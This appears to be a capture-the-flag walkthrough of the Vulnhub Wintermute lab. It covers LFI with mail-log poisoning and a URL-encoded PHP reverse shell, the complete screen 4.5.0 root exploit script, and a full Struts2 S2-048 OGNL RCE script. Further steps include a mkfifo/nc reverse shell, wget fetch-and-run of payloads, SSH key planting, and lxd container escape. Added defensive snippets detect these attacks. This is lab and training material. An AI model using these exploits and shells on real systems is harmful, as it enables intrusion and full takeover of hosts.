[Vulnhub]Wintermute LFI+SMTP+Screen+Structv2-RCE+L…

2024-06-22

Overview

Target 192.168.8.104

Information gathering

$ nmap 192.168.8.103 --min-rate 1000 -sC -sV

Result:

Starting Nmap 7.92 ( https://nmap.org ) at 2024-06-15 05:54 EDT
Nmap scan report for 192.168.8.103 (192.168.8.103)
Host is up (0.035s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT     STATE SERVICE         VERSION
25/tcp   open  smtp            Postfix smtpd
|_smtp-commands: straylight, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8
| ssl-cert: Subject: commonName=straylight
| Subject Alternative Name: DNS:straylight
| Not valid before: 2018-05-12T18:08:02
|_Not valid after:  2028-05-09T18:08:02
|_ssl-date: TLS randomness does not represent time
80/tcp   open  http            Apache httpd 2.4.25 ((Debian))
|_http-title: Night City
|_http-server-header: Apache/2.4.25 (Debian)
3000/tcp open  hadoop-datanode Apache Hadoop
| http-title: Welcome to ntopng
|_Requested resource was /lua/login.lua?referer=/
|_http-trane-info: Problem with XML parsing of /evox/about
| hadoop-tasktracker-info:
|_  Logs: submit
| hadoop-datanode-info:
|_  Logs: submit
Service Info: Host:  straylight

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.39 seconds

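We visit port 3000 and find an ntopng service running.

ntopng is a high-performance network monitoring tool and traffic analysis platform. It provides a rich graphical user interface for monitoring network traffic in real time and analysing network behaviour. ntopng is the upgraded version of the ntop project, with more features and better performance.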

username:admin
password:admin

After logging in to the admin interface with the default credentials, we find that port 80 also exposes a directory named turing-bolo.

http://192.168.8.103//turing-bolo/

Append the three files shown in the screenshot to the URL:
molly.log
armitage.log
riviera.log

http://192.168.8.103//turing-bolo/bolo.php?bolo=molly.log

When we remove the .log suffix:

http://192.168.8.103//turing-bolo/bolo.php?bolo=molly

So bolo.php appends .log to the supplied parameter and then includes the resulting file.

The Nmap scan report shows that the SMTP service is running, so a mail.log log file must exist under /var/log.

http://192.168.8.103//turing-bolo/bolo.php?bolo=/var/log/mail


$ nc -nC 192.168.8.103 25


http://192.168.8.103//turing-bolo/bolo.php?bolo=/var/log/mail


Get Shell

$ nc -lvnp 10032

http://192.168.8.103//turing-bolo/bolo.php?cmd=php%20-r%20%27%24sock%3Dfsockopen%28%22192.168.8.107%22%2C10032%29%3Bexec%28%22%2Fbin%2Fbash%20%3C%263%20%3E%263%202%3E%263%22%29%3B%27&bolo=/var/log/mail
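Seen from the defender's side, the requests above stand out in the web server's access log. The following added example (not part of the original write-up) flags requests to bolo.php whose bolo value is not one of the three log names listed earlier, or that carry parameters other than bolo. The log lines are constructed and the allow-list is an assumption.

```python
import re
from urllib.parse import parse_qs

# Constructed Apache access-log lines; only the request paths follow the
# write-up (cmd=id stands in for the longer command), the rest is made up.
SAMPLE_LOG = '''\
192.168.8.107 - - [15/Jun/2024:06:01:10 -0400] "GET //turing-bolo/bolo.php?bolo=molly HTTP/1.1" 200 1532 "-" "Mozilla/5.0"
192.168.8.107 - - [15/Jun/2024:06:02:31 -0400] "GET //turing-bolo/bolo.php?bolo=armitage HTTP/1.1" 200 1710 "-" "Mozilla/5.0"
192.168.8.107 - - [15/Jun/2024:06:03:42 -0400] "GET //turing-bolo/bolo.php?bolo=/var/log/mail HTTP/1.1" 200 48211 "-" "Mozilla/5.0"
192.168.8.107 - - [15/Jun/2024:06:09:05 -0400] "GET //turing-bolo/bolo.php?cmd=id&bolo=/var/log/mail HTTP/1.1" 200 48390 "-" "Mozilla/5.0"
'''

REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
ALLOWED_LOGS = {"molly", "armitage", "riviera"}  # assumed allow-list: the logs the page lists


def audit_line(line):
    """Return the reasons a request to bolo.php looks like include abuse."""
    m = REQUEST.search(line)
    if not m:
        return []
    path, _, query = m.group(1).partition("?")
    if not path.endswith("/bolo.php"):
        return []
    params = parse_qs(query, keep_blank_values=True)  # also URL-decodes values
    reasons = []
    for value in params.get("bolo", []):
        if value not in ALLOWED_LOGS:
            reasons.append(f"bolo={value!r} is not an expected log name")
    extra = sorted(set(params) - {"bolo"})
    if extra:
        reasons.append("unexpected parameters: " + ", ".join(extra))
    return reasons


def audit(log_text):
    """Return (client_ip, reasons) for every suspicious line in the log."""
    findings = []
    for line in log_text.splitlines():
        reasons = audit_line(line)
        if reasons:
            findings.append((line.split()[0], reasons))
    return findings
```

The same allow-list, applied inside bolo.php before the include, is what removes the file-inclusion path altogether.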


Local.txt screenshot

Local.txt contents

dainowandiawd

Privilege escalation

$ find / -perm -u=s -type f 2>/dev/null

We search for a privilege escalation exploit script:

$ searchsploit screen 4.5.0


#!/bin/bash
# screenroot.sh
# setuid screen v4.5.0 local root exploit
# abuses ld.so.preload overwriting to get root.
# bug: https://lists.gnu.org/archive/html/screen-devel/2017-01/msg00025.html
# HACK THE PNET
# ~ infodox (25/1/2017)
echo "~ gnu/screenroot ~"
echo "[+] First, we create our shell and library..."
cat << EOF > /tmp/libhax.c
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){
    chown("/tmp/rootshell", 0, 0);
    chmod("/tmp/rootshell", 04755);
    unlink("/etc/ld.so.preload");
    printf("[+] done!\n");
}
EOF
gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c
rm -f /tmp/libhax.c
cat << EOF > /tmp/rootshell.c
#include <stdio.h>
int main(void){
    setuid(0);
    setgid(0);
    seteuid(0);
    setegid(0);
    execvp("/bin/sh", NULL, NULL);
}
EOF
gcc -o /tmp/rootshell /tmp/rootshell.c
rm -f /tmp/rootshell.c
echo "[+] Now we create our /etc/ld.so.preload file..."
cd /etc
umask 000 # because
screen -D -m -L ld.so.preload echo -ne  "\x0a/tmp/libhax.so" # newline needed
echo "[+] Triggering..."
screen -ls # screen itself is setuid, so...
/tmp/rootshell

$ cd /tmp
$ wget http://192.168.8.107/root.sh
$ chmod +x root.sh
$ ./root.sh

Proot.txt screenshot

Proot.txt contents

dainowandiawd

Target 192.168.28.4

Information gathering

A description was found in note.txt:

Devs,

Lady 3Jane has asked us to create a custom java app on Neuromancer's primary server to help her interact w/ the AI via a web-based GUI.

The engineering team couldn't strss enough how risky that is, opening up a Super AI to remote access on the Freeside network. It is within out internal admin network, but still, it should be off the network completely. For the sake of humanity, user access should only be allowed via the physical console...who knows what this thing can do.

Anyways, we've deployed the war file on tomcat as ordered - located here:

/struts2_2.3.15.1-showcase

It's ready for the devs to customize to her liking...I'm stating the obvious, but make sure to secure this thing.

Regards,

Bob Laugh
Turing Systems Engineer II

The administrator appears to have deployed struts2_2.3.15.1, but it appears to be risky.

Using arp we find that there are other hosts on the local network, so we need to move laterally.

./chisel server -p 2333 --socks5

./chisel client 192.168.8.103:2333 socks

Connect to 127.0.0.1:1080 through proxychains. You can run proxychains -h to find out where the configuration file is.

Run the scan:

$ proxychains -f ./internal.conf nmap 192.168.28.4 --min-rate 1000 -Pn


$ proxychains -f ./internal.conf nmap -p 8009,8080 192.168.28.4 -Pn -sC -sV

Get Shell

Following the hint in the note above, we visit the directory.

$ searchsploit struts2


#!/usr/bin/python
# -*- coding: utf-8 -*-

# Just a demo for CVE-2017-9791


import requests


def exploit(url, cmd):
    print("[+] command: %s" % cmd)

    payload = "%{"
    payload += "(#[email protected]@DEFAULT_MEMBER_ACCESS)."
    payload += "(#_memberAccess?(#_memberAccess=#dm):"
    payload += "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
    payload += "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
    payload += "(#ognlUtil.getExcludedPackageNames().clear())."
    payload += "(#ognlUtil.getExcludedClasses().clear())."
    payload += "(#context.setMemberAccess(#dm))))."
    payload += "(@java.lang.Runtime@getRuntime().exec('%s'))" % cmd
    payload += "}"

    data = {
        "name": payload,
        "age": 20,
        "__checkbox_bustedBefore": "true",
        "description": 1
    }

    headers = {
        'Referer': 'http://127.0.0.1:8080/2.3.15.1-showcase/integration/editGangster'
    }
    requests.post(url, data=data, headers=headers)


if __name__ == '__main__':
    import sys

    if len(sys.argv) != 3:
        print("python %s <url> <cmd>" % sys.argv[0])
        sys.exit(0)

    print('[*] exploit Apache Struts2 S2-048')
    url = sys.argv[1]
    cmd = sys.argv[2]

    exploit(url, cmd)

    # $ ncat -v -l -p 4444 &
    # $ python exploit_S2-048.py http://127.0.0.1:8080/2.3.15.1-showcase/integration/saveGangster.action "ncat -e /bin/bash 127.0.0.1 4444"
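For detection, the payload built by the demo above has a recognisable shape: an OGNL expression opener inside an ordinary form field, followed by references to OGNL internals. The following added example (not part of the original write-up or of the demo script) scores submitted form fields on those markers after undoing nested URL encoding; the sample forms are constructed and the marker list is an assumption drawn from the payload shown above.

```python
from urllib.parse import unquote_plus
import re

# Markers taken from the S2-048 demo payload shown above.
OGNL_OPEN = re.compile(r"[%$]\{")
OGNL_MARKERS = ("#_memberAccess", "#context", "@java.lang.Runtime@",
                "OgnlUtil", "getExcludedClasses", "getExcludedPackageNames")

# Constructed form submissions using field names from the demo above.
# ENCODED_FORM carries an inert, double URL-encoded "%{#_memberAccess}".
BENIGN_FORM = {"name": "Armitage", "age": 20, "description": "50% {off} today"}
ENCODED_FORM = {"name": "%2525%257B%2523_memberAccess%257D", "age": 20}


def decode_fully(value, max_rounds=3):
    """Undo up to max_rounds layers of URL encoding (evasion by double-encoding)."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def score_field(value):
    """0 if no OGNL opener is present, otherwise 1 plus the number of markers seen."""
    text = decode_fully(str(value))
    if not OGNL_OPEN.search(text):
        return 0
    return 1 + sum(marker in text for marker in OGNL_MARKERS)


def suspicious_fields(form):
    """Return {field name: score} for every field that contains an OGNL opener."""
    scores = {name: score_field(value) for name, value in form.items()}
    return {name: s for name, s in scores.items() if s > 0}
```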

First, on host B we use socat for port forwarding: it listens on local port 10034 on host B and forwards the data to the Kali machine at 192.168.8.107:10034.

$ socat TCP-LISTEN:10034,fork,reuseaddr TCP:192.168.8.107:10034 &


rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.28.3 10034 >/tmp/f

Save the command above as re.sh.

(Kali)$ python3 -m http.server 10034

(kali)$ proxychains -f internal.conf python3 exp.py http://192.168.28.4:8080/struts2_2.3.15.1-showcase/integration/saveGangster.action "wget http://192.168.28.3:10034/re.sh -O /tmp/re.sh"


(kali)$ nc -lvnp 10034

(kali)$ proxychains -f internal.conf python3 exp.py http://192.168.28.4:8080/struts2_2.3.15.1-showcase/integration/saveGangster.action "chmod +x /tmp/re.sh"

(kali)$ proxychains -f internal.conf python3 exp.py http://192.168.28.4:8080/struts2_2.3.15.1-showcase/integration/saveGangster.action "sh /tmp/re.sh"

Local.txt screenshot

Local.txt contents

dwhai1d2

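Privilege escalation

Because this connection is extremely unstable, we connect over ssh instead.

We check for write permission under the /home directory: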

ta@neuromancer:/home$ for dir in /home/*/; do touch "$dir/1.txt"; done

We find that the user ta can create files.

ta@neuromancer:/home$ ssh-keygen
ta@neuromancer:/home$ cat /home/ta/.ssh/id_rsa
ta@neuromancer:~/.ssh$ cat id_rsa.pub >authorized_keys

Copy the private key and save it on Kali under the file name id_rsa.

(kali)$ chmod 400 id_rsa

However, the target's ssh service listens on port 34483.

(kali)$ proxychains -f internal.conf ssh -i id_rsa [email protected] -p 34483

We find that the user ta is a member of the lxd group, which we can use to escalate privileges.

(kali)$ git clone https://github.com/saghul/lxd-alpine-builder.git

(kali)$ cd lxd-alpine-builder

Build the package:

(kali)$ sudo ./build-alpine

(192.168.8.103)$ socat TCP-LISTEN:10035,fork,reuseaddr TCP:192.168.8.107:10035 &

(kali)$ python3 -m http.server 10035

ta@neuromancer:/tmp$ wget http://192.168.28.3:10035/alpine-v3.20-x86_64-20240613_1112.tar.gz -O /tmp/alpine-v3.20-x86_64-20240613_1112.tar.gz

ta@neuromancer:/tmp$ lxc image import /tmp/alpine-v3.20-x86_64-20240613_1112.tar.gz --alias test

ta@neuromancer:/tmp$ lxc image list


ta@neuromancer:/tmp$ lxc init test ignite -c security.privileged=true

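lxc init myimage ignite: initialises a container named ignite based on the myimage image.
-c security.privileged=true: configures the container as a privileged container. This means that processes in the container run with root privileges and may directly access the host's devices and file system.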

ta@neuromancer:/tmp$ lxc config device add ignite test disk source=/ path=/mnt/root recursive=true

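/mnt/root is chosen as the mount point to keep the mount operation safe, explicit and free of conflicts. This lets you conveniently access and operate on the host's file system from inside the container, which is what achieves the privilege escalation.

lxc config device add ignite mydevice disk: adds a device named mydevice, of type disk, to the ignite container.
source=/: specifies the host's root directory / as the source directory.
path=/mnt/root: mounts that directory at /mnt/root inside the container.
recursive=true: mounts recursively, including subdirectories.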

$ lxc start ignite

$ lxc exec ignite /bin/sh

Escape successful
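The root cause of this last step is that membership of the lxd group is equivalent to root on the host. As an added example (not from the original write-up), the following audit lists accounts in such groups, including accounts that hold the group only as their primary GID and therefore do not appear in the member field of /etc/group. The passwd and group excerpts are constructed, and docker and disk are added as a generalisation beyond the lxd case shown here.

```python
# Constructed /etc/passwd and /etc/group excerpts. Only the user "ta" and its
# lxd membership come from the write-up; every other entry is made up.
PASSWD = """\
root:x:0:0:root:/root:/bin/bash
ta:x:1000:1000:ta:/home/ta:/bin/bash
builder:x:1001:110:build account:/home/builder:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
"""
GROUP = """\
root:x:0:
www-data:x:33:
lxd:x:110:ta
docker:x:998:
ta:x:1000:
"""

# Groups whose members can obtain root on the host. lxd is the one used in the
# write-up; docker and disk are added here as a generalisation.
ROOT_EQUIVALENT = {"lxd", "docker", "disk"}


def root_equivalent_users(passwd_text, group_text):
    """Map each risky group to its users (supplementary or primary membership)."""
    gid_to_name, members = {}, {}
    for line in group_text.splitlines():
        fields = line.split(":")
        if len(fields) < 4:
            continue  # skip malformed or empty lines
        name, gid, users = fields[0], fields[2], fields[3]
        gid_to_name[gid] = name
        members[name] = {u for u in users.split(",") if u}
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) < 7:
            continue
        user, gid = fields[0], fields[3]
        # A primary group never shows up in the member field of /etc/group.
        group = gid_to_name.get(gid)
        if group is not None:
            members[group].add(user)
    return {g: sorted(members[g]) for g in ROOT_EQUIVALENT if members.get(g)}
```

On a live host the two inputs are the contents of /etc/passwd and /etc/group; any account reported here that is not an intended administrator should be removed from the group.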

Proot.txt screenshot

Local.txt contents

diwoinwad
